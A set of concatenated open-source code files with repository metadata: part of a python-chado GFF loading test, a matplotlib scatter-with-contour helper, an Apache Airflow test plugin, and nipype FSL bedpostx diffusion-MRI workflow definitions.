peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
assert pep_f.name == "XM_008184894.2"
assert pep_f.uniquename == "some_prot_id"
def test_load_gff_nosource(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot_nosource.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 2, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 2, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 15, "mRNA relationships, single peptide"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def setUp(self):
self.ci = ci
self.ci.organism.delete_organisms()
self.ci.analysis.delete_analyses()
self.ci.feature.delete_features()
# Make sure dbxref are deleted too
self._del_dbxref()
self.ci.session.commit()
def tearDown(self):
self.ci.organism.delete_organisms()
self.ci.analysis.delete_analyses()
self.ci.feature.delete_features()
# Make sure dbxref are deleted too
self._del_dbxref()
self.ci.session.commit()
|
{
"content_hash": "127b29a7169c938190decc0582c5f787",
"timestamp": "",
"source": "github",
"line_count": 1673,
"max_line_length": 224,
"avg_line_length": 57.75313807531381,
"alnum_prop": 0.659577110566026,
"repo_name": "abretaud/python-chado",
"id": "cb8efbf57e23f1773e16baff74bd67525b3c0dff",
"size": "96621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/gff_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "84"
},
{
"name": "Python",
"bytes": "65493"
}
],
"symlink_target": ""
}
|
import numpy as np
import pylab as pl
def scatter_contour(x, y,
levels=10,
threshold=100,
log_counts=False,
histogram2d_args={},
scatter_args={},
contour_args={},
contour_lw={},
hist_bins = 10,
ax=None):
"""Scatter plot with contour over dense regions
Parameters
----------
x, y : arrays
x and y data for the contour plot
levels : integer or array (optional, default=10)
number of contour levels, or array of contour levels
threshold : float (default=100)
number of points per 2D bin at which to begin drawing contours
log_counts :boolean (optional)
if True, contour levels are the base-10 logarithm of bin counts.
histogram2d_args : dict
keyword arguments passed to numpy.histogram2d
see doc string of numpy.histogram2d for more information
scatter_args : dict
keyword arguments passed to pylab.scatter
see doc string of pylab.scatter for more information
contourf_args : dict
keyword arguments passed to pylab.contourf
see doc string of pylab.contourf for more information
hist_bins: int
number of bins for the 2d histogram
ax: mpl axis instance
used to update an exisiting plot.
"""
H, xbins, ybins = np.histogram2d(x, y, hist_bins, **histogram2d_args)
Nx = len(xbins)
Ny = len(ybins)
if log_counts:
H = np.log10(1 + H)
threshold = np.log10(1 + threshold)
levels = np.asarray(levels)
if levels.size == 1:
levels = np.linspace(threshold, H.max(), levels)
# only plot points which fall outside contoured region
x_i = np.digitize(x, xbins) - 1
y_i = np.digitize(y, ybins) - 1
x_i[x_i < 0] = 0
x_i[x_i >= H.shape[0]] = H.shape[0] - 1
y_i[y_i < 0] = 0
y_i[y_i >= H.shape[1]] = H.shape[1] - 1
flag = (H[x_i, y_i] <= levels[1])
if ax == None:
sc = pl.scatter(x[flag], y[flag], **scatter_args)
co = pl.contourf(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_args)
if len(contour_lw) != 0:
cf = pl.contour(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_lw)
else:
sc = ax.scatter(x[flag], y[flag], **scatter_args)
co = ax.contourf(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_args)
if len(contour_lw) != 0:
cf = ax.contour(H.T, levels,
extent=[xbins[0], xbins[-1], ybins[0], ybins[-1]],
**contour_lw)
return sc,co
|
{
"content_hash": "6c813e0dd314aefc66d03e11380fa8d7",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 78,
"avg_line_length": 34.22352941176471,
"alnum_prop": 0.5256101753179787,
"repo_name": "philrosenfield/ResolvedStellarPops",
"id": "ac8be9ca9ac8a88e608b43d51d1a72834df6135b",
"size": "2909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scatter_contour.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "356874"
},
{
"name": "TeX",
"bytes": "90575"
}
],
"symlink_target": ""
}
|
from flask import Blueprint
from flask_appbuilder import BaseView as AppBuilderBaseView, expose
from airflow.executors.base_executor import BaseExecutor
# Importing base classes that we need to derive
from airflow.hooks.base import BaseHook
from airflow.models.baseoperator import BaseOperator
# This is the class you derive to create a plugin
from airflow.plugins_manager import AirflowPlugin
from airflow.sensors.base import BaseSensorOperator
from airflow.timetables.interval import CronDataIntervalTimetable
from tests.test_utils.mock_operators import (
AirflowLink,
AirflowLink2,
CustomBaseIndexOpLink,
CustomOpLink,
GithubLink,
GoogleLink,
)
# Will show up under airflow.hooks.test_plugin.PluginHook
class PluginHook(BaseHook):
pass
# Will show up under airflow.operators.test_plugin.PluginOperator
class PluginOperator(BaseOperator):
pass
# Will show up under airflow.sensors.test_plugin.PluginSensorOperator
class PluginSensorOperator(BaseSensorOperator):
pass
# Will show up under airflow.executors.test_plugin.PluginExecutor
class PluginExecutor(BaseExecutor):
pass
# Will show up under airflow.macros.test_plugin.plugin_macro
def plugin_macro():
pass
# Creating a flask appbuilder BaseView
class PluginTestAppBuilderBaseView(AppBuilderBaseView):
default_view = "test"
@expose("/")
def test(self):
return self.render_template("test_plugin/test.html", content="Hello galaxy!")
v_appbuilder_view = PluginTestAppBuilderBaseView()
v_appbuilder_package = {"name": "Test View", "category": "Test Plugin", "view": v_appbuilder_view}
v_nomenu_appbuilder_package = {"view": v_appbuilder_view}
# Creating flask appbuilder Menu Items
appbuilder_mitem = {
"name": "Google",
"href": "https://www.google.com",
"category": "Search",
}
appbuilder_mitem_toplevel = {
"name": "apache",
"href": "https://www.apache.org/",
"label": "The Apache Software Foundation",
}
# Creating a flask blueprint to integrate the templates and static folder
bp = Blueprint(
"test_plugin",
__name__,
template_folder='templates', # registers airflow/plugins/templates as a Jinja template folder
static_folder='static',
static_url_path='/static/test_plugin',
)
# Extend an existing class to avoid the need to implement the full interface
class CustomCronDataIntervalTimetable(CronDataIntervalTimetable):
pass
# Defining the plugin class
class AirflowTestPlugin(AirflowPlugin):
name = "test_plugin"
operators = [PluginOperator]
sensors = [PluginSensorOperator]
hooks = [PluginHook]
executors = [PluginExecutor]
macros = [plugin_macro]
flask_blueprints = [bp]
appbuilder_views = [v_appbuilder_package]
appbuilder_menu_items = [appbuilder_mitem, appbuilder_mitem_toplevel]
global_operator_extra_links = [
AirflowLink(),
GithubLink(),
]
operator_extra_links = [GoogleLink(), AirflowLink2(), CustomOpLink(), CustomBaseIndexOpLink(1)]
timetables = [CustomCronDataIntervalTimetable]
class MockPluginA(AirflowPlugin):
name = 'plugin-a'
class MockPluginB(AirflowPlugin):
name = 'plugin-b'
class MockPluginC(AirflowPlugin):
name = 'plugin-c'
class AirflowTestOnLoadPlugin(AirflowPlugin):
name = 'preload'
def on_load(self, *args, **kwargs):
self.name = 'postload'
|
{
"content_hash": "2c836b96066dc7d48bebcd54a3275cdd",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 99,
"avg_line_length": 26.944,
"alnum_prop": 0.7354513064133017,
"repo_name": "apache/incubator-airflow",
"id": "bae3d93db4768d126ed035c2ea40b82acc3c509d",
"size": "4156",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/plugins/test_plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "69070"
},
{
"name": "Dockerfile",
"bytes": "2001"
},
{
"name": "HTML",
"bytes": "283783"
},
{
"name": "JavaScript",
"bytes": "1387552"
},
{
"name": "Mako",
"bytes": "1284"
},
{
"name": "Python",
"bytes": "5482822"
},
{
"name": "Shell",
"bytes": "40957"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from ....pipeline import engine as pe
from ....interfaces import utility as niu
from ....interfaces import fsl
from ....algorithms import misc
# backwards compatibility
from .epi import create_eddy_correct_pipeline
def transpose(samples_over_fibres):
import numpy as np
a = np.array(samples_over_fibres)
return np.squeeze(a.T).tolist()
def create_bedpostx_pipeline(name='bedpostx', params={'n_fibres': 2, 'fudge': 1, 'burn_in': 1000,
'n_jumps': 1250, 'sample_every': 25, 'model': 2,
'cnlinear': True}):
"""
Creates a pipeline that does the same as bedpostx script from FSL -
calculates diffusion model parameters (distributions not MLE) voxelwise for
the whole volume (by splitting it slicewise).
Example
-------
>>> from nipype.workflows.dmri.fsl.dti import create_bedpostx_pipeline
>>> params = dict(n_fibres = 2, fudge = 1, burn_in = 1000,
... n_jumps = 1250, sample_every = 25)
>>> bpwf = create_bedpostx_pipeline('nipype_bedpostx', params)
>>> bpwf.inputs.inputnode.dwi = 'diffusion.nii'
>>> bpwf.inputs.inputnode.mask = 'mask.nii'
>>> bpwf.inputs.inputnode.bvecs = 'bvecs'
>>> bpwf.inputs.inputnode.bvals = 'bvals'
>>> bpwf.run() # doctest: +SKIP
Inputs::
inputnode.dwi
inputnode.mask
inputnode.bvecs
inputnode.bvals
Outputs::
outputnode wraps all XFibres outputs
"""
inputnode = pe.Node(niu.IdentityInterface(fields=['dwi', 'mask',
'bvecs', 'bvals']), name='inputnode')
slice_dwi = pe.Node(fsl.Split(dimension='z'), name='slice_dwi')
slice_msk = pe.Node(fsl.Split(dimension='z'), name='slice_msk')
mask_dwi = pe.MapNode(fsl.ImageMaths(op_string='-mas'),
iterfield=['in_file', 'in_file2'], name='mask_dwi')
xfib_if = fsl.XFibres(**params)
xfibres = pe.MapNode(xfib_if, name='xfibres',
iterfield=['dwi', 'mask'])
make_dyads = pe.MapNode(fsl.MakeDyadicVectors(), name="make_dyads",
iterfield=['theta_vol', 'phi_vol'])
out_fields = ['dyads', 'dyads_disp',
'thsamples', 'phsamples', 'fsamples',
'mean_thsamples', 'mean_phsamples', 'mean_fsamples']
outputnode = pe.Node(niu.IdentityInterface(fields=out_fields),
name='outputnode')
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, slice_dwi, [('dwi', 'in_file')]),
(inputnode, slice_msk, [('mask', 'in_file')]),
(slice_dwi, mask_dwi, [('out_files', 'in_file')]),
(slice_msk, mask_dwi, [('out_files', 'in_file2')]),
(slice_dwi, xfibres, [('out_files', 'dwi')]),
(mask_dwi, xfibres, [('out_file', 'mask')]),
(inputnode, xfibres, [('bvecs', 'bvecs'),
('bvals', 'bvals')]),
(inputnode, make_dyads, [('mask', 'mask')])
])
mms = {}
for k in ['thsamples', 'phsamples', 'fsamples']:
mms[k] = merge_and_mean(k)
wf.connect([
(xfibres, mms[k], [(k, 'inputnode.in_files')]),
(mms[k], outputnode, [('outputnode.merged', k),
('outputnode.mean', 'mean_%s' % k)])
])
# m_mdsamples = pe.Node(fsl.Merge(dimension="z"),
# name="merge_mean_dsamples")
wf.connect([
(mms['thsamples'], make_dyads, [('outputnode.merged', 'theta_vol')]),
(mms['phsamples'], make_dyads, [('outputnode.merged', 'phi_vol')]),
# (xfibres, m_mdsamples, [('mean_dsamples', 'in_files')]),
(make_dyads, outputnode, [('dyads', 'dyads'),
('dispersion', 'dyads_disp')])
])
return wf
def merge_and_mean(name='mm'):
inputnode = pe.Node(niu.IdentityInterface(fields=['in_files']),
name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(fields=['merged', 'mean']),
name='outputnode')
merge = pe.MapNode(fsl.Merge(dimension='z'), name='Merge',
iterfield=['in_files'])
mean = pe.MapNode(fsl.ImageMaths(op_string='-Tmean'), name='Mean',
iterfield=['in_file'])
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, merge, [(('in_files', transpose), 'in_files')]),
(merge, mean, [('merged_file', 'in_file')]),
(merge, outputnode, [('merged_file', 'merged')]),
(mean, outputnode, [('out_file', 'mean')])
])
return wf
def bedpostx_parallel(name='bedpostx_parallel',
compute_all_outputs=True,
params={'n_fibres': 2, 'fudge': 1, 'burn_in': 1000,
'n_jumps': 1250, 'sample_every': 25, 'model': 1,
'cnlinear': True}):
"""
Does the same as :func:`.create_bedpostx_pipeline` by splitting
the input dMRI in small ROIs that are better suited for parallel
processing).
Example
-------
>>> from nipype.workflows.dmri.fsl.dti import bedpostx_parallel
>>> params = dict(n_fibres = 2, fudge = 1, burn_in = 1000,
... n_jumps = 1250, sample_every = 25)
>>> bpwf = bedpostx_parallel('nipype_bedpostx_parallel', params=params)
>>> bpwf.inputs.inputnode.dwi = 'diffusion.nii'
>>> bpwf.inputs.inputnode.mask = 'mask.nii'
>>> bpwf.inputs.inputnode.bvecs = 'bvecs'
>>> bpwf.inputs.inputnode.bvals = 'bvals'
>>> bpwf.run(plugin='CondorDAGMan') # doctest: +SKIP
Inputs::
inputnode.dwi
inputnode.mask
inputnode.bvecs
inputnode.bvals
Outputs::
outputnode wraps all XFibres outputs
"""
inputnode = pe.Node(niu.IdentityInterface(fields=['dwi', 'mask',
'bvecs', 'bvals']), name='inputnode')
slice_dwi = pe.Node(misc.SplitROIs(roi_size=(5, 5, 1)), name='slice_dwi')
if params is not None:
xfib_if = fsl.XFibres5(**params)
else:
xfib_if = fsl.XFibres5()
xfibres = pe.MapNode(xfib_if, name='xfibres',
iterfield=['dwi', 'mask'])
mrg_dyads = pe.MapNode(misc.MergeROIs(), name='Merge_dyads',
iterfield=['in_files'])
mrg_fsamp = pe.MapNode(misc.MergeROIs(), name='Merge_mean_fsamples',
iterfield=['in_files'])
out_fields = ['dyads', 'fsamples']
if compute_all_outputs:
out_fields += ['dyads_disp', 'thsamples', 'phsamples',
'mean_fsamples', 'mean_thsamples', 'mean_phsamples',
'merged_fsamples', 'merged_thsamples',
'merged_phsamples']
outputnode = pe.Node(niu.IdentityInterface(fields=out_fields),
name='outputnode')
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, slice_dwi, [('dwi', 'in_file'),
('mask', 'in_mask')]),
(slice_dwi, xfibres, [('out_files', 'dwi'),
('out_masks', 'mask')]),
(inputnode, xfibres, [('bvecs', 'bvecs'),
('bvals', 'bvals')]),
(inputnode, mrg_dyads, [('mask', 'in_reference')]),
(xfibres, mrg_dyads, [(('dyads', transpose), 'in_files')]),
(slice_dwi, mrg_dyads, [('out_index', 'in_index')]),
(inputnode, mrg_fsamp, [('mask', 'in_reference')]),
(xfibres, mrg_fsamp, [(('mean_fsamples', transpose), 'in_files')]),
(slice_dwi, mrg_fsamp, [('out_index', 'in_index')]),
(mrg_dyads, outputnode, [('merged_file', 'dyads')]),
(mrg_fsamp, outputnode, [('merged_file', 'fsamples')])
])
if compute_all_outputs:
make_dyads = pe.MapNode(fsl.MakeDyadicVectors(), name="Make_dyads",
iterfield=['theta_vol', 'phi_vol'])
wf.connect([(inputnode, make_dyads, [('mask', 'mask')])])
mms = {}
for k in ['thsamples', 'phsamples', 'fsamples']:
mms[k] = merge_and_mean_parallel(k)
wf.connect([
(slice_dwi, mms[k], [('out_index', 'inputnode.in_index')]),
(inputnode, mms[k], [('mask', 'inputnode.in_reference')]),
(xfibres, mms[k], [(k, 'inputnode.in_files')]),
(mms[k], outputnode, [('outputnode.merged', 'merged_%s' % k),
('outputnode.mean', 'mean_%s' % k)])
])
# m_mdsamples = pe.Node(fsl.Merge(dimension="z"),
# name="merge_mean_dsamples")
wf.connect([
(mms['thsamples'], make_dyads, [('outputnode.merged', 'theta_vol')]),
(mms['phsamples'], make_dyads, [('outputnode.merged', 'phi_vol')]),
# (xfibres, m_mdsamples, [('mean_dsamples', 'in_files')]),
(make_dyads, outputnode, [('dispersion', 'dyads_disp')])
])
return wf
def merge_and_mean_parallel(name='mm'):
inputnode = pe.Node(niu.IdentityInterface(fields=['in_files',
'in_reference', 'in_index']), name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(fields=['merged', 'mean']),
name='outputnode')
merge = pe.MapNode(misc.MergeROIs(), name='Merge',
iterfield=['in_files'])
mean = pe.MapNode(fsl.ImageMaths(op_string='-Tmean'), name='Mean',
iterfield=['in_file'])
wf = pe.Workflow(name=name)
wf.connect([
(inputnode, merge, [(('in_files', transpose), 'in_files'),
('in_reference', 'in_reference'),
('in_index', 'in_index')]),
(merge, mean, [('merged_file', 'in_file')]),
(merge, outputnode, [('merged_file', 'merged')]),
(mean, outputnode, [('out_file', 'mean')])
])
return wf
|
{
"content_hash": "ca61b95bb0b635f934a9ecf0a4b2ead5",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 102,
"avg_line_length": 39.266666666666666,
